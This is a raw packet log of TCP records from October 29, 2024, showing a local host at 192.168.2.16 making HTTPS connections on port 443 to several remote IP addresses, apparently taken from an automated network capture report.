                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.423733950 CET49888443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.423793077 CET4434988854.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.423871994 CET49888443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.426878929 CET49888443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.426902056 CET4434988854.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:23.269731045 CET4434988854.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:23.270008087 CET49888443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:23.270025015 CET4434988854.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:23.271076918 CET4434988854.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:23.271142960 CET49888443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:23.272420883 CET49888443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:23.272485018 CET4434988854.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:23.272622108 CET49888443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:23.272629976 CET4434988854.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:23.316675901 CET49888443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:23.514635086 CET4434988854.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:23.514719963 CET4434988854.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:23.514826059 CET49888443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:23.516222954 CET49888443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:23.516242981 CET4434988854.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:23.517014027 CET49895443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:23.517085075 CET4434989554.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:23.517177105 CET49895443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:23.517441034 CET49895443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:23.517455101 CET4434989554.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.357394934 CET4434989554.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.357841015 CET49895443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.357872963 CET4434989554.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.358288050 CET4434989554.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.358872890 CET49895443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.358954906 CET4434989554.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.359139919 CET49895443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.399337053 CET4434989554.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.606950998 CET4434989554.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.607038021 CET4434989554.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.607129097 CET49895443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.607938051 CET49895443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.607975960 CET4434989554.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.620781898 CET49904443192.168.2.1654.171.192.42
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.620834112 CET4434990454.171.192.42192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.620906115 CET49904443192.168.2.1654.171.192.42
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.621139050 CET49904443192.168.2.1654.171.192.42
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.621155977 CET4434990454.171.192.42192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.634959936 CET49905443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.634984016 CET4434990563.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.635051966 CET49905443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.635493994 CET49905443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.635508060 CET4434990563.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.638026953 CET49906443192.168.2.1652.49.181.118
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.638061047 CET4434990652.49.181.118192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.638130903 CET49906443192.168.2.1652.49.181.118
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.638405085 CET49906443192.168.2.1652.49.181.118
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.638422012 CET4434990652.49.181.118192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.639683962 CET4434990454.171.192.42192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.639949083 CET49904443192.168.2.1654.171.192.42
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.639965057 CET4434990454.171.192.42192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.640604019 CET4434990652.49.181.118192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.640779018 CET49906443192.168.2.1652.49.181.118
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.640788078 CET4434990652.49.181.118192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.641134977 CET4434990454.171.192.42192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.641535997 CET49904443192.168.2.1654.171.192.42
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.641535997 CET49904443192.168.2.1654.171.192.42
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.641602039 CET4434990454.171.192.42192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.641727924 CET49904443192.168.2.1654.171.192.42
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.641737938 CET4434990454.171.192.42192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.641858101 CET4434990652.49.181.118192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.641922951 CET49906443192.168.2.1652.49.181.118
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.642983913 CET49906443192.168.2.1652.49.181.118
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.643064976 CET4434990652.49.181.118192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.643176079 CET49906443192.168.2.1652.49.181.118
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.643184900 CET4434990652.49.181.118192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.644850969 CET4434990563.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.645176888 CET49905443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.645195961 CET4434990563.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.646301985 CET4434990563.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.646373987 CET49905443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.647190094 CET49905443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.647353888 CET49905443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.647589922 CET4434990563.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.647651911 CET4434990563.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.682622910 CET49904443192.168.2.1654.171.192.42
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.682984114 CET49906443192.168.2.1652.49.181.118
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.698693037 CET49905443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.698719025 CET4434990563.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.746618032 CET49905443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.886323929 CET4434990563.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.886409044 CET4434990563.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.886491060 CET49905443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.887126923 CET49905443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.887144089 CET4434990563.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.891017914 CET49915443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.891052008 CET4434991554.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.891129017 CET49915443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.891372919 CET49915443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.891386032 CET4434991554.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.900955915 CET49916443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.900986910 CET4434991663.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.901051998 CET49916443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.901240110 CET49916443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.901257038 CET4434991663.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.918862104 CET4434990652.49.181.118192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.918889046 CET4434990652.49.181.118192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.918922901 CET4434990652.49.181.118192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.918945074 CET4434990652.49.181.118192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.919003963 CET49906443192.168.2.1652.49.181.118
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.919043064 CET49906443192.168.2.1652.49.181.118
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.919517040 CET4434990454.171.192.42192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.919593096 CET4434990454.171.192.42192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.919641018 CET49904443192.168.2.1654.171.192.42
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.919991016 CET49906443192.168.2.1652.49.181.118
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.920007944 CET4434990652.49.181.118192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.920466900 CET49904443192.168.2.1654.171.192.42
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.920471907 CET4434990454.171.192.42192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.736942053 CET4434991663.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.737313032 CET49916443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.737344980 CET4434991663.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.738442898 CET4434991663.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.738502979 CET49916443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.739288092 CET49916443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.739372969 CET4434991663.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.739659071 CET49916443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.739667892 CET4434991663.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.747334957 CET4434991554.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.748295069 CET49915443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.748311043 CET4434991554.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.748699903 CET4434991554.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.749083996 CET49915443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.749164104 CET4434991554.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.749243975 CET49915443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.791337967 CET4434991554.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.794584036 CET49915443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.794584990 CET49916443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.979342937 CET4434991663.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.979418993 CET4434991663.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.980446100 CET49916443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.980446100 CET49916443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.996184111 CET4434991554.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.996354103 CET4434991554.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.996423960 CET49915443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.997201920 CET49915443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.997220039 CET4434991554.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:27.004070044 CET49924443192.168.2.1654.171.192.42
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:27.004116058 CET4434992454.171.192.42192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:27.004209042 CET49924443192.168.2.1654.171.192.42
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:27.004515886 CET49924443192.168.2.1654.171.192.42
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:27.004535913 CET4434992454.171.192.42192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:27.285701990 CET49916443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:27.285732031 CET4434991663.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:27.845889091 CET4434992454.171.192.42192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:27.846196890 CET49924443192.168.2.1654.171.192.42
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:27.846204996 CET4434992454.171.192.42192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:27.846606016 CET4434992454.171.192.42192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:27.846925974 CET49924443192.168.2.1654.171.192.42
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:27.847006083 CET4434992454.171.192.42192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:27.847055912 CET49924443192.168.2.1654.171.192.42
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:27.891334057 CET4434992454.171.192.42192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:28.099270105 CET4434992454.171.192.42192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:28.099360943 CET4434992454.171.192.42192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:28.099412918 CET49924443192.168.2.1654.171.192.42
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:28.100606918 CET49924443192.168.2.1654.171.192.42
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:28.100626945 CET4434992454.171.192.42192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.292803049 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.335335970 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.446902990 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.446963072 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.447005033 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.447009087 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.447038889 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.447077990 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.447079897 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.447094917 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.447232008 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.447478056 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.488550901 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.564789057 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.564872026 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.564913034 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.564954042 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.564968109 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.565027952 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.565176010 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.606977940 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.607076883 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.607189894 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.607211113 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.607352018 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.682966948 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.683345079 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.683379889 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.683497906 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.683518887 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.683568001 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.683585882 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.683594942 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.683653116 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.724409103 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.724483013 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.724513054 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.724647045 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.724661112 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.724843025 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.061132908 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.061201096 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.061336040 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.061359882 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.063710928 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.063745975 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.063750982 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.063771963 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.063824892 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.063858986 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.063884974 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.063893080 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.063914061 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.063927889 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.063957930 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.064007998 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.064014912 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.064106941 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.064243078 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.064250946 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.064291000 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.067336082 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.067390919 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.067439079 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.067454100 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.078464031 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.078520060 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.078530073 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.078732014 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.156136036 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.156269073 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.156277895 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.156461954 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.315363884 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.315408945 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.315545082 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.315562010 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.315956116 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.393316984 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.393497944 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.511576891 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.511765957 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.565048933 CET49956443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.565092087 CET4434995654.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.565203905 CET49956443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.565519094 CET49956443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.565536976 CET4434995654.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.592489004 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.592681885 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.629630089 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.629802942 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.747606993 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.747678041 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.747754097 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.747773886 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.747803926 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.747881889 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.828571081 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.828808069 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.866349936 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.866527081 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.946696043 CET44349861104.18.66.57192.168.2.16
